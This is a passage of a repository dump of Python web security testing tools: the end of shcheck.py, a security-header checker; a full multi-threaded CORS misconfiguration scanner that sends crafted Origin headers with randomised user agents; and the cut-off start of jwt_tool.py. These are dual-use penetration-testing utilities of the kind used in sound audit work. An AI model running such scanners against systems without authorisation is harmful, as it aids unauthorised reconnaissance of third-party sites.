'Server', 91 | 'X-AspNet-Version', 92 | 'X-AspNetMvc-Version' 93 | } 94 | 95 | cache_headers = { 96 | 'Cache-Control', 97 | 'Pragma', 98 | 'Last-Modified' 99 | 'Expires', 100 | 'ETag' 101 | } 102 | 103 | headers = {} 104 | 105 | 106 | def banner(): 107 | log("") 108 | log("======================================================") 109 | log(" > shcheck.py - santoru ..............................") 110 | log("------------------------------------------------------") 111 | log(" Simple tool to check security headers on a webserver ") 112 | log("======================================================") 113 | log("") 114 | 115 | 116 | def colorize(string, alert): 117 | bcolors = darkcolours 118 | if options.colours == "light": 119 | bcolors = lightcolours 120 | elif options.colours == "none": 121 | return string 122 | color = { 123 | 'error': bcolors.FAIL + string + bcolors.ENDC, 124 | 'warning': bcolors.WARNING + string + bcolors.ENDC, 125 | 'ok': bcolors.OKGREEN + string + bcolors.ENDC, 126 | 'info': bcolors.OKBLUE + string + bcolors.ENDC, 127 | 'deprecated': string # No color for deprecated headers or not-an-issue ones 128 | } 129 | return color[alert] if alert in color else string 130 | 131 | 132 | def parse_headers(hdrs): 133 | global headers 134 | headers = dict((x.lower(), y) for x, y in hdrs) 135 | 136 | 137 | def append_port(target, port): 138 | return target[:-1] + ':' + port + '/' \ 139 | if target[-1:] == '/' \ 140 | else target + ':' + port + '/' 141 | 142 | 143 | def build_opener(proxy, ssldisabled): 144 | proxyhnd = urllib.request.ProxyHandler() 145 | sslhnd = urllib.request.HTTPSHandler() 146 | if proxy: 147 | proxyhnd = urllib.request.ProxyHandler({ 148 | 'http': proxy, 149 | 'https': proxy 150 | }) 151 | if ssldisabled: 152 | ctx = ssl.create_default_context() 153 | ctx.check_hostname = False 154 | ctx.verify_mode = ssl.CERT_NONE 155 | sslhnd = urllib.request.HTTPSHandler(context = ctx) 156 | 157 | opener = urllib.request.build_opener(proxyhnd, sslhnd) 158 | urllib.request.install_opener(opener) 159 | 160 | 161 | def normalize(target): 162 | try: 163 | if (socket.inet_aton(target)): 164 | target = 'http://' + target 165 | except (ValueError, socket.error): 166 | pass 167 | finally: 168 | return target 169 | 170 | 171 | def print_error(target, e): 172 | sys.stdout = sys.__stdout__ 173 | if isinstance(e, ValueError): 174 | print("Unknown url type") 175 | 176 | elif isinstance(e, urllib.error.HTTPError): 177 | print("[!] 
URL Returned an HTTP error: {}".format( 178 | colorize(str(e.code), 'error'))) 179 | 180 | elif isinstance(e, urllib.error.URLError): 181 | if "CERTIFICATE_VERIFY_FAILED" in str(e.reason): 182 | print("SSL: Certificate validation error.\nIf you want to \ 183 | ignore it run the program with the \"-d\" option.") 184 | else: 185 | print("Target host {} seems to be unreachable ({})".format(target, e.reason)) 186 | 187 | else: 188 | print("{}".format(str(e))) 189 | 190 | 191 | def check_target(target): 192 | ''' 193 | Just put a protocol to a valid IP and check if connection works, 194 | returning HEAD response 195 | ''' 196 | # Recover used options 197 | ssldisabled = options.ssldisabled 198 | useget = options.useget 199 | usemethod = options.usemethod 200 | proxy = options.proxy 201 | response = None 202 | 203 | target = normalize(target) 204 | 205 | request = urllib.request.Request(target, headers=client_headers) 206 | # Set method 207 | method = "GET" if useget else usemethod 208 | request.get_method = lambda: method 209 | 210 | # Build opener for proxy and SSL 211 | build_opener(proxy, ssldisabled) 212 | try: 213 | response = urllib.request.urlopen(request, timeout=10) 214 | 215 | # Handling issues with HTTP/2 216 | except http.client.UnknownProtocol as e: 217 | print("Unknown protocol: {}. Are you using a proxy? Try disabling it".format(e)) 218 | except Exception as e: 219 | print_error(target, e) 220 | if hasattr(e, 'code') and e.code >= 400 and e.code < 500: 221 | response = e 222 | else: 223 | return None 224 | 225 | if response is not None: 226 | return response 227 | print("Couldn't read a response from server.") 228 | return None 229 | 230 | 231 | def is_https(target): 232 | ''' 233 | Check if target support HTTPS for Strict-Transport-Security 234 | ''' 235 | return target.startswith('https://') 236 | 237 | 238 | def report(target, safe, unsafe): 239 | log("-------------------------------------------------------") 240 | log("[!] 
Headers analyzed for {}".format(colorize(target, 'info'))) 241 | log("[+] There are {} security headers".format(colorize(str(safe), 'ok'))) 242 | log("[-] There are not {} security headers".format( 243 | colorize(str(unsafe), 'error'))) 244 | log("") 245 | 246 | def parse_csp(csp): 247 | unsafe_operators = ['unsafe-inline', 'unsafe-eval', 'unsafe-hashes', 'wasm-unsafe-eval', 'self'] 248 | log("Value:") 249 | policy_directive = csp.split(";") 250 | for policy in policy_directive: 251 | elements = policy.lstrip().split(" ", 1) 252 | 253 | values = elements[1].replace("*", colorize("*", 'warning')) if len(elements) > 1 else "" 254 | for x in unsafe_operators: 255 | values = values.replace(x, colorize(x, 'error')) 256 | log("\t" + colorize(elements[0], 'info') + (": " + values if values != "" else "")) 257 | 258 | 259 | def main(): 260 | # Getting options 261 | global options 262 | options, targets = parse_options() 263 | 264 | port = options.port 265 | cookie = options.cookie 266 | custom_headers = options.custom_headers 267 | information = options.information 268 | cache_control = options.cache_control 269 | show_deprecated = options.show_deprecated 270 | hfile = options.hfile 271 | json_output = options.json_output 272 | 273 | # Disabling printing if json output is requested 274 | if json_output: 275 | global json_headers 276 | sys.stdout = open(os.devnull, 'w') 277 | 278 | banner() 279 | # Set a custom port if provided 280 | if cookie is not None: 281 | client_headers.update({'Cookie': cookie}) 282 | 283 | # Set custom headers if provided 284 | if custom_headers is not None: 285 | for header in custom_headers: 286 | # Split supplied string of format 'Header: value' 287 | header_split = header.split(': ') 288 | # Add to existing headers using header name and header value 289 | try: 290 | client_headers.update({header_split[0]: header_split[1]}) 291 | except IndexError: 292 | s = "[!] 
Header strings must be of the format 'Header: value'" 293 | print(s) 294 | raise SystemExit(1) 295 | 296 | if hfile is not None: 297 | with open(hfile) as f: 298 | targets = f.read().splitlines() 299 | 300 | json_out = {} 301 | for target in targets: 302 | json_headers = {} 303 | if port is not None: 304 | target = append_port(target, port) 305 | 306 | safe = 0 307 | unsafe = 0 308 | 309 | log("[*] Analyzing headers of {}".format(colorize(target, 'info'))) 310 | 311 | # Check if target is valid 312 | response = check_target(target) 313 | if not response: 314 | continue 315 | rUrl = response.geturl() 316 | json_results = {} 317 | 318 | log("[*] Effective URL: {}".format(colorize(rUrl, 'info'))) 319 | parse_headers(response.getheaders()) 320 | json_headers[f"{rUrl}"] = json_results 321 | json_results["present"] = {} 322 | json_results["missing"] = [] 323 | 324 | # Before parsing, remove X-Frame-Options if there's CSP with frame-ancestors directive 325 | if "content-security-policy" in headers.keys() and "frame-ancestors" in headers.get("content-security-policy").lower(): 326 | sec_headers.pop("X-Frame-Options", None) 327 | headers.pop("X-Frame-Options".lower(), None) 328 | 329 | for safeh in sec_headers: 330 | lsafeh = safeh.lower() 331 | if lsafeh in headers: 332 | safe += 1 333 | json_results["present"][safeh] = headers.get(lsafeh) 334 | 335 | # Taking care of special headers that could have bad values 336 | 337 | # Parse CSP headers 338 | if lsafeh == 'Content-Security-Policy'.lower(): 339 | log("[*] Header {} is present!".format( 340 | colorize(safeh, 'ok'))) 341 | parse_csp(headers.get(lsafeh)) 342 | 343 | # X-XSS-Protection Should be enabled 344 | elif lsafeh == 'X-XSS-Protection'.lower() and headers.get(lsafeh) == '0': 345 | log("[*] Header {} is present! (Value: {})".format( 346 | colorize(safeh, 'ok'), 347 | colorize(headers.get(lsafeh), 'warning'))) 348 | 349 | # unsafe-url policy is more insecure compared to the default/unset value 350 | elif lsafeh == 'Referrer-Policy'.lower() and headers.get(lsafeh) == 'unsafe-url': 351 | log("[!] Insecure header {} is set! (Value: {})".format( 352 | colorize(safeh, 'warning'), 353 | colorize(headers.get(lsafeh), 'error'))) 354 | 355 | # check for max-age=0 in HSTS 356 | elif lsafeh == 'Strict-Transport-Security'.lower() and "max-age=0" in headers.get(lsafeh): 357 | log("[!] Insecure header {} is set! (Value: {})".format( 358 | colorize(safeh, 'warning'), 359 | colorize(headers.get(lsafeh), 'error'))) 360 | 361 | # Printing generic message if not specified above 362 | else: 363 | log("[*] Header {} is present! (Value: {})".format( 364 | colorize(safeh, 'ok'), 365 | headers.get(lsafeh))) 366 | else: 367 | unsafe += 1 368 | json_results["missing"].append(safeh) 369 | # HSTS works obviously only on HTTPS 370 | if safeh == 'Strict-Transport-Security'.lower() and not is_https(rUrl): 371 | unsafe -= 1 372 | json_results["missing"].remove(safeh) 373 | continue 374 | # Hide deprecated 375 | if not show_deprecated and sec_headers.get(safeh) == "deprecated": 376 | unsafe -= 1 377 | json_results["missing"].remove(safeh) 378 | continue 379 | log('[!] Missing security header: {}'.format( 380 | colorize(safeh, sec_headers.get(safeh)))) 381 | 382 | if information: 383 | json_headers["information_disclosure"] = {} 384 | i_chk = False 385 | log("") 386 | for infoh in information_headers: 387 | linfoh = infoh.lower() 388 | if linfoh in headers: 389 | json_headers["information_disclosure"][infoh] = headers.get(linfoh) 390 | i_chk = True 391 | log("[!] 
Possible information disclosure: \ 392 | header {} is present! (Value: {})".format( 393 | colorize(infoh, 'warning'), 394 | headers.get(linfoh))) 395 | if not i_chk: 396 | log("[*] No information disclosure headers detected") 397 | 398 | if cache_control: 399 | json_headers["caching"] = {} 400 | c_chk = False 401 | log("") 402 | for cacheh in cache_headers: 403 | lcacheh = cacheh.lower() 404 | if lcacheh in headers: 405 | json_headers["caching"][cacheh] = headers.get(lcacheh) 406 | c_chk = True 407 | log("[!] Cache control header {} is present! \ 408 | (Value: {})".format( 409 | colorize(cacheh, 'info'), 410 | headers.get(lcacheh))) 411 | if not c_chk: 412 | log("[*] No caching headers detected") 413 | 414 | report(rUrl, safe, unsafe) 415 | json_out.update(json_headers) 416 | 417 | if json_output: 418 | sys.stdout = sys.__stdout__ 419 | print(json.dumps(json_out)) 420 | 421 | 422 | 423 | def parse_options(): 424 | parser = OptionParser("Usage: %prog [options] ", prog=sys.argv[0]) 425 | 426 | parser.add_option("-p", "--port", dest="port", 427 | help="Set a custom port to connect to", 428 | metavar="PORT") 429 | parser.add_option("-c", "--cookie", dest="cookie", 430 | help="Set cookies for the request", 431 | metavar="COOKIE_STRING") 432 | parser.add_option("-a", "--add-header", dest="custom_headers", 433 | help="Add headers for the request e.g. 'Header: value'", 434 | metavar="HEADER_STRING", 435 | action="append") 436 | parser.add_option('-d', "--disable-ssl-check", dest="ssldisabled", 437 | default=False, 438 | help="Disable SSL/TLS certificate validation", 439 | action="store_true") 440 | parser.add_option('-g', "--use-get-method", dest="useget", 441 | default=False, help="Use GET method instead HEAD method", 442 | action="store_true") 443 | parser.add_option('-m', "--use-method", dest="usemethod", default='HEAD', 444 | choices=["HEAD", "GET", "POST", "PUT", "DELETE", "TRACE"], 445 | help="Use a specified method",) 446 | parser.add_option("-j", "--json-output", dest="json_output", 447 | default=False, help="Print the output in JSON format", 448 | action="store_true") 449 | parser.add_option("-i", "--information", dest="information", default=False, 450 | help="Display information headers", 451 | action="store_true") 452 | parser.add_option("-x", "--caching", dest="cache_control", default=False, 453 | help="Display caching headers", 454 | action="store_true") 455 | parser.add_option("-k", "--deprecated", dest="show_deprecated", default=False, 456 | help="Display deprecated headers", 457 | action="store_true") 458 | parser.add_option("--proxy", dest="proxy", 459 | help="Set a proxy (Ex: http://127.0.0.1:8080)", 460 | metavar="PROXY_URL") 461 | parser.add_option("--hfile", dest="hfile", 462 | help="Load a list of hosts from a flat file", 463 | metavar="PATH_TO_FILE") 464 | parser.add_option("--colours", dest="colours", 465 | help="Set up a colour profile [dark/light/none]", 466 | default="dark") 467 | parser.add_option("--colors", dest="colours", 468 | help="Alias for colours for US English") 469 | (options, targets) = parser.parse_args() 470 | 471 | if len(targets) < 1 and options.hfile is None: 472 | parser.print_help() 473 | sys.exit(12) 474 | 475 | return options, targets 476 | 477 | if __name__ == "__main__": 478 | main() 479 | -------------------------------------------------------------------------------- /tools/cors_scanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | 4 | __author__ = "Jake Miller 
(@LaconicWolf)" 5 | __date__ = "20191119" 6 | __version__ = "0.01" 7 | __description__ = """A multi-threaded scanner to help discover CORS flaws.""" 8 | 9 | 10 | import sys 11 | 12 | if not sys.version.startswith('3'): 13 | print('\n[-] This script will only work with Python3. Sorry!\n') 14 | exit() 15 | 16 | import os 17 | import threading 18 | import time 19 | import argparse 20 | from queue import Queue 21 | from urllib.parse import urlparse 22 | from random import randrange, choice 23 | from string import ascii_lowercase 24 | 25 | # Third party modules 26 | missing_modules = [] 27 | try: 28 | import requests 29 | import tqdm 30 | except ImportError as error: 31 | missing_module = str(error).split(' ')[-1] 32 | missing_modules.append(missing_module) 33 | 34 | if missing_modules: 35 | for m in missing_modules: 36 | print('[-] Missing module: {}'.format(m)) 37 | print('[*] Try running "pip3 install {}", or do an Internet search for installation instructions.\n'.format(m.strip("'"))) 38 | exit() 39 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 40 | 41 | 42 | def get_random_useragent(): 43 | """Returns a randomly chosen User-Agent string.""" 44 | win_edge = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246' 45 | win_firefox = 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/43.0' 46 | win_chrome = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36" 47 | lin_firefox = 'Mozilla/5.0 (X11; Linux i686; rv:30.0) Gecko/20100101 Firefox/42.0' 48 | mac_chrome = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36' 49 | ie = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)' 50 | ua_dict = { 51 | 1: win_edge, 52 | 2: win_firefox, 53 | 3: win_chrome, 54 | 4: lin_firefox, 55 | 5: mac_chrome, 56 | 6: ie 57 | } 58 | rand_num = randrange(1, (len(ua_dict) + 1)) 59 | return ua_dict[rand_num] 60 | 61 | 62 | def print_dict(origin, d): 63 | """Prints the contents of a dictionary.""" 64 | print(f'Origin: {origin}') 65 | for k in d: 66 | with print_lock: 67 | print(f"{k.upper()}:{d.get(k)}") 68 | 69 | 70 | def parse_cors_dict(d): 71 | """Formats dictionary values as a list for printing.""" 72 | cors_headers = [ 73 | 'acao', 74 | 'acac', 75 | 'acam', 76 | 'acah', 77 | 'acma', 78 | 'aceh' 79 | ] 80 | parsed_list = [] 81 | for header in cors_headers: 82 | if header in d.keys(): 83 | parsed_list.append(d.get(header)) 84 | else: 85 | parsed_list.append('') 86 | return parsed_list 87 | 88 | 89 | def write_csv(data): 90 | """Writes a CSV file. 
Appends to file if it already exists.""" 91 | col_headers = [ 92 | 'URL', 93 | 'Origin', 94 | 'ACAO', 95 | 'ACAC', 96 | 'ACAM', 97 | 'ACAH', 98 | 'ACMA', 99 | 'ACEH' 100 | ] 101 | csv_name = args.csv_name if args.csv_name else 'CORS_Results-' + time.strftime('%d%b%Y%H%M%S') + '.csv' 102 | if os.path.exists(csv_name): 103 | print() 104 | print(f'[+] Appending to {csv_name}.') 105 | with open(csv_name, 'a') as fh: 106 | for item in data: 107 | url = item[0] 108 | origin = item[1] 109 | cors_dict = item[2] 110 | parsed_list = parse_cors_dict(cors_dict) 111 | parsed_string = ','.join(parsed_list) 112 | fh.write(f'{url},{origin},{parsed_string}\n') 113 | else: 114 | print(f'[+] Writing to {csv_name}.') 115 | with open(csv_name, 'w') as fh: 116 | print() 117 | fh.write(','.join(col_headers) + '\n') 118 | for item in data: 119 | url = item[0] 120 | origin = item[1] 121 | cors_dict = item[2] 122 | parsed_list = parse_cors_dict(cors_dict) 123 | parsed_string = ','.join(parsed_list) 124 | fh.write(f'{url},{origin},{parsed_string}\n') 125 | print('[*] Complete!') 126 | 127 | 128 | def parse_cors_response_headers(response): 129 | """Returns a dictionary of CORS response headers from 130 | a specified response object. 131 | """ 132 | cors_response_headers = {} 133 | if 'Access-Control-Allow-Origin' in response.headers.keys(): 134 | cors_response_headers['acao'] = response.headers.get('Access-Control-Allow-Origin').replace(',',';') 135 | if 'Access-Control-Allow-Credentials' in response.headers.keys(): 136 | cors_response_headers['acac'] = response.headers.get('Access-Control-Allow-Credentials').replace(',',';') 137 | if 'Access-Control-Allow-Methods' in response.headers.keys(): 138 | cors_response_headers['acam'] = response.headers.get('Access-Control-Allow-Methods').replace(',',';') 139 | if 'Access-Control-Allow-Headers' in response.headers.keys(): 140 | cors_response_headers['acah'] = response.headers.get('Access-Control-Allow-Headers').replace(',',';') 141 | if 'Access-Control-Max-Age' in response.headers.keys(): 142 | cors_response_headers['acma'] = response.headers.get('Access-Control-Max-Age').replace(',',';') 143 | if 'Access-Control-Expose-Headers' in response.headers.keys(): 144 | cors_response_headers['aceh'] = response.headers.get('Access-Control-Expose-Headers').replace(',',';') 145 | return cors_response_headers 146 | 147 | 148 | def make_request(sess, url): 149 | """Makes a request and returns a response object.""" 150 | try: 151 | return sess.get(url, verify=False) 152 | except Exception as e: 153 | if args.verbose: 154 | print(f'[-] An error occurred: {e}') 155 | return False 156 | 157 | 158 | def existing_cors_policy(url): 159 | """Makes a request with the Origin header value set as the 160 | host and checks to see if any ACAO or ACAC header values appear. 161 | """ 162 | origin = urlparse(url).netloc 163 | s = build_request_object() 164 | s.headers['Origin'] = origin 165 | resp = make_request(s, url) 166 | if not resp: return 167 | cors_response_headers = parse_cors_response_headers(resp) 168 | if any(value != '' for value in cors_response_headers.values()): 169 | data.append((url, origin, cors_response_headers)) 170 | if args.verbose: 171 | print_dict(origin, cors_response_headers) 172 | 173 | 174 | def null_origin(url): 175 | """Makes a request with a null origin header and checks 176 | the response for CORS headers. 
177 | """ 178 | origin = 'null' 179 | s = build_request_object() 180 | s.headers['Origin'] = origin 181 | resp = make_request(s, url) 182 | if not resp: return 183 | cors_response_headers = parse_cors_response_headers(resp) 184 | if any(value != '' for value in cors_response_headers.values()): 185 | data.append((url, origin, cors_response_headers)) 186 | if args.verbose: 187 | print_dict(origin, cors_response_headers) 188 | 189 | 190 | def reflected_origin(url): 191 | """Makes a request with a random Origin header value and 192 | checks to see if that value is echoed in the ACAO header. 193 | Returns the ACAO header value or None. 194 | """ 195 | random_string = ''.join(choice(ascii_lowercase) for i in range(12)) 196 | origin = f"{random_string}.com" 197 | s = build_request_object() 198 | s.headers['Origin'] = origin 199 | resp = make_request(s, url) 200 | if not resp: return 201 | cors_response_headers = parse_cors_response_headers(resp) 202 | if any(value != '' for value in cors_response_headers.values()): 203 | data.append((url, origin, cors_response_headers)) 204 | if args.verbose: 205 | print_dict(origin, cors_response_headers) 206 | 207 | 208 | def scheme_origin(url): 209 | """Makes a request checking with the Origin header value as 210 | HTTP or HTTPS, opposite of whatever the URL is, and prints the 211 | CORS headers.""" 212 | scheme = urlparse(url).scheme 213 | if scheme == 'https': 214 | origin = f"http://{urlparse(url).netloc}" 215 | else: 216 | origin = f"https://{urlparse(url).netloc}" 217 | s = build_request_object() 218 | s.headers['Origin'] = origin 219 | resp = make_request(s, url) 220 | if not resp: return 221 | cors_response_headers = parse_cors_response_headers(resp) 222 | if any(value != '' for value in cors_response_headers.values()): 223 | data.append((url, origin, cors_response_headers)) 224 | if args.verbose: 225 | print_dict(origin, cors_response_headers) 226 | 227 | 228 | def mangled_front_origin(url): 229 | """Makes a request with the Origin header value with the regular 230 | value prepended with 12 random characters and prints and CORS 231 | response headers. 232 | """ 233 | random_string = ''.join(choice(ascii_lowercase) for i in range(12)) 234 | origin = f"{random_string}{urlparse(url).netloc}" 235 | s = build_request_object() 236 | s.headers['Origin'] = origin 237 | resp = make_request(s, url) 238 | if not resp: return 239 | cors_response_headers = parse_cors_response_headers(resp) 240 | if any(value != '' for value in cors_response_headers.values()): 241 | data.append((url, origin, cors_response_headers)) 242 | if args.verbose: 243 | print_dict(origin, cors_response_headers) 244 | 245 | 246 | def mangled_rear_origin(url): 247 | """Makes a request with the Origin header value with the regular 248 | value appended with 12 random characters and prints and CORS 249 | response headers. 
250 | """ 251 | random_string = ''.join(choice(ascii_lowercase) for i in range(12)) 252 | origin = f"{urlparse(url).netloc.split(':')[0]}.{random_string}.{urlparse(url).netloc.split('.')[-1]}" 253 | s = build_request_object() 254 | s.headers['Origin'] = origin 255 | resp = make_request(s, url) 256 | if not resp: return 257 | cors_response_headers = parse_cors_response_headers(resp) 258 | if any(value != '' for value in cors_response_headers.values()): 259 | data.append((url, origin, cors_response_headers)) 260 | if args.verbose: 261 | print_dict(origin, cors_response_headers) 262 | 263 | 264 | 265 | def build_request_object(): 266 | """Returns a session object with user specified data. 267 | """ 268 | # Initialize a session object 269 | s = requests.Session() 270 | 271 | # Add a user agent from commandline options or select 272 | # a random user agent. 273 | #user_agent = args.useragent if args.useragent else get_random_useragent() 274 | user_agent = get_random_useragent() 275 | s.headers['User-Agent'] = user_agent 276 | 277 | # Parse and add cookies specified from commandline options 278 | if args.cookies: 279 | for item in cookie_list: 280 | domain_cookies = item[1] 281 | cookies = domain_cookies.split(';') 282 | for cookie in cookies: 283 | cookie_name = cookie.split('=')[0].lstrip() 284 | cookie_value = '='.join(cookie.split('=')[1:]).lstrip() 285 | s.cookies[cookie_name] = cookie_value 286 | 287 | # Add referer if specified by commandline options 288 | if args.referer: 289 | s.headers['Referer'] = args.referer 290 | 291 | # Add a proxy if specified by commandline options 292 | if args.proxy: 293 | s.proxies['http'] = args.proxy 294 | s.proxies['https'] = args.proxy 295 | 296 | # Add a custom header if specified 297 | if args.custom_header: 298 | cust_header = args.custom_header.split('~~~')[0] 299 | cust_value = args.custom_header.split('~~~')[1] 300 | s.headers[cust_header] = cust_value 301 | return s 302 | 303 | 304 | def test_cors_policy(url): 305 | """Runs several tests on a URL, each making a request with 306 | a different Origin header value. The responses are parsed and 307 | written to a CSV file. 308 | """ 309 | existing_cors_policy(url) 310 | null_origin(url) 311 | reflected_origin(url) 312 | scheme_origin(url) 313 | mangled_front_origin(url) 314 | mangled_rear_origin(url) 315 | 316 | if not args.verbose: 317 | # Update the status bar 318 | with print_lock: 319 | p_bar.update(counter + 1) 320 | 321 | 322 | def manage_queue(): 323 | """Manages the url queue and calls the test_cors_policy function""" 324 | while True: 325 | current_url = url_queue.get() 326 | test_cors_policy(current_url) 327 | url_queue.task_done() 328 | 329 | 330 | def main(): 331 | for i in range(args.threads): 332 | t = threading.Thread(target=manage_queue) 333 | t.daemon = True 334 | t.start() 335 | 336 | for current_url in urls: 337 | url_queue.put(current_url) 338 | 339 | url_queue.join() 340 | 341 | write_csv(data) 342 | 343 | 344 | 345 | if __name__ == '__main__': 346 | parser = argparse.ArgumentParser() 347 | parser.add_argument("-v", "--verbose", 348 | help="increase output verbosity", 349 | action="store_true") 350 | parser.add_argument("-pr", "--proxy", 351 | help="specify a proxy to use (-pr 127.0.0.1:8080)") 352 | parser.add_argument("-ch", "--custom-header", 353 | nargs="*", 354 | help='specify a custom header and value, delimited with ~~~. 
Example: -a "X-Custom-Header~~~Custom-Value"') 355 | parser.add_argument("-a", "--auth", 356 | nargs="*", 357 | help='specify a domain, and value delimited with ~~~. Example: -a "example.com~~~Bearer eyJhb..."') 358 | parser.add_argument("-c", "--cookies", 359 | nargs="*", 360 | help='specify a domain(s) and cookie(s) data delimited with ~~~. Example: -c "example.com~~~C1=IlV0ZXh0L2h; C2=AHWqTUmF8I;" "http://example2.com:80~~~Token=19005936-1"') 361 | parser.add_argument("-ua", "--useragent", 362 | help="specify a User Agent string to use. Default is a random User Agent string.") 363 | parser.add_argument("-r", "--referer", 364 | help="specify a referer string to use.") 365 | parser.add_argument("-uf", "--url_file", 366 | help="specify a file containing urls formatted http(s)://addr:port.") 367 | parser.add_argument("-u", "--url", 368 | help="specify a single url formatted http(s)://addr:port.") 369 | parser.add_argument("-csv", "--csv_name", 370 | help="specify a CSV file name. If the file already exists, the file will be appended to.") 371 | parser.add_argument("-t", "--threads", 372 | nargs="?", 373 | type=int, 374 | const=10, 375 | default=10, 376 | help="specify number of threads (default=10)") 377 | parser.add_argument("-to", "--timeout", 378 | nargs="?", 379 | type=int, 380 | default=10, 381 | help="specify number of seconds until a connection timeout (default=10)") 382 | args = parser.parse_args() 383 | 384 | # Suppress SSL warnings in the terminal 385 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 386 | 387 | # Parse the urls 388 | if not args.url and not args.url_file: 389 | parser.print_help() 390 | print("\n[-] Please specify a URL (-u) or an input file containing URLs (-uf).\n") 391 | exit() 392 | if args.url and args.url_file: 393 | parser.print_help() 394 | print("\n[-] Please specify a URL (-u) or an input file containing URLs (-uf). Not both\n") 395 | exit() 396 | if args.url_file: 397 | url_file = args.url_file 398 | if not os.path.exists(url_file): 399 | print("\n[-] The file cannot be found or you do not have permission to open the file. Please check the path and try again\n") 400 | exit() 401 | urls = open(url_file).read().splitlines() 402 | if args.url: 403 | if not args.url.startswith('http'): 404 | parser.print_help() 405 | print("\n[-] Please specify a URL in the format proto://address:port (https://example.com:80).\n") 406 | exit() 407 | urls = [args.url] 408 | 409 | # Parses cookies 410 | if args.cookies: 411 | cookie_list = [] 412 | for item in args.cookies: 413 | if '~~~' not in item: 414 | print('\n[-] Please specify the domain with the cookies using 3 tildes as a delimiter to separate the domain the cookie (-c "https://example.com:8443~~~C1=IlV0ZXh0L2h; C2=AHWqTUmF8I; Token=19005936-1").\n') 415 | exit() 416 | cookie_domain = item.split('~~~')[0] 417 | cookies = item.split('~~~')[1] 418 | if cookie_domain.strip('/') not in [u.strip('/') for u in urls]: 419 | print('\n[-] Could not find {} in the URL list. Make sure to specify the domain in proto://domain:port format. Exiting.\n'.format(cookie_domain)) 420 | exit() 421 | else: 422 | cookie_list.append((cookie_domain, cookies)) 423 | 424 | # Threading lock and queue initialization 425 | print_lock = threading.Lock() 426 | url_queue = Queue() 427 | 428 | # Print banner and arguments 429 | print() 430 | word_banner = '{} version: {}. 
Coded by: {}'.format(sys.argv[0].title()[:-3], __version__, __author__) 431 | print('=' * len(word_banner)) 432 | print(word_banner) 433 | print('=' * len(word_banner)) 434 | print() 435 | for arg in vars(args): 436 | if getattr(args, arg): 437 | if arg == 'auth': 438 | continue 439 | print('{}: {}'.format(arg.title().replace('_',' '), getattr(args, arg))) 440 | print() 441 | time.sleep(3) 442 | 443 | if not args.verbose: 444 | # Initializes progress bar 445 | p_bar = tqdm.tqdm(range(len(urls))) 446 | counter = 0 447 | 448 | # Shared data variable 449 | data = [] 450 | 451 | main() 452 | -------------------------------------------------------------------------------- /tools/jwt_tool.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # JWT_Tool version 2.2.4 (08_07_2021) 4 | # Written by Andy Tyler (@ticarpi) 5 | # Please use responsibly... 6 | # Software URL: https://github.com/ticarpi/jwt_tool 7 | # Web: https://www.ticarpi.com 8 | # Twitter: @ticarpi 9 | 10 | jwttoolvers = "2.2.4" 11 | import ssl 12 | import sys 13 | import os 14 | import re 15 | import hashlib 16 | import hmac 17 | import base64 18 | import json 19 | import random 20 | import argparse 21 | from datetime import datetime 22 | import configparser 23 | from http.cookies import SimpleCookie 24 | from collections import OrderedDict 25 | try: 26 | from Cryptodome.Signature import PKCS1_v1_5, DSS, pss 27 | from Cryptodome.Hash import SHA256, SHA384, SHA512 28 | from Cryptodome.PublicKey import RSA, ECC 29 | except: 30 | print("WARNING: Cryptodome libraries not imported - these are needed for asymmetric crypto signing and verifying") 31 | print("On most Linux systems you can run the following command to install:") 32 | print("python3 -m pip install pycryptodomex\n") 33 | exit(1) 34 | try: 35 | from termcolor import cprint 36 | except: 37 | print("WARNING: termcolor library is not imported - this is used to make the output clearer and oh so pretty") 38 | print("On most Linux systems you can run the following command to install:") 39 | print("python3 -m pip install termcolor\n") 40 | exit(1) 41 | try: 42 | import requests 43 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 44 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 45 | except: 46 | print("WARNING: Python Requests libraries not imported - these are needed for external service interaction") 47 | print("On most Linux systems you can run the following command to install:") 48 | print("python3 -m pip install requests\n") 49 | exit(1) 50 | # To fix broken colours in Windows cmd/Powershell: uncomment the below two lines. 
You will need to install colorama: 'python3 -m pip install colorama' 51 | # import colorama 52 | # colorama.init() 53 | 54 | def cprintc(textval, colval): 55 | if not args.bare: 56 | cprint(textval, colval) 57 | 58 | def createConfig(): 59 | privKeyName = "jwttool_custom_private_RSA.pem" 60 | pubkeyName = "jwttool_custom_public_RSA.pem" 61 | ecprivKeyName = "jwttool_custom_private_EC.pem" 62 | ecpubkeyName = "jwttool_custom_public_EC.pem" 63 | jwksName = "jwttool_custom_jwks.json" 64 | if (os.path.isfile(privKeyName)) and (os.path.isfile(pubkeyName)) and (os.path.isfile(ecprivKeyName)) and (os.path.isfile(ecpubkeyName)) and (os.path.isfile(jwksName)): 65 | cprintc("Found existing Public and Private Keys - using these...", "cyan") 66 | origjwks = open(jwksName, "r").read() 67 | jwks_b64 = base64.b64encode(origjwks.encode('ascii')) 68 | else: 69 | # gen RSA keypair 70 | pubKey, privKey = newRSAKeyPair() 71 | with open(privKeyName, 'w') as test_priv_out: 72 | test_priv_out.write(privKey.decode()) 73 | with open(pubkeyName, 'w') as test_pub_out: 74 | test_pub_out.write(pubKey.decode()) 75 | # gen EC keypair 76 | ecpubKey, ecprivKey = newECKeyPair() 77 | with open(ecprivKeyName, 'w') as ectest_priv_out: 78 | ectest_priv_out.write(ecprivKey) 79 | with open(ecpubkeyName, 'w') as ectest_pub_out: 80 | ectest_pub_out.write(ecpubKey) 81 | # gen jwks 82 | new_key = RSA.importKey(pubKey) 83 | n = base64.urlsafe_b64encode(new_key.n.to_bytes(256, byteorder='big')) 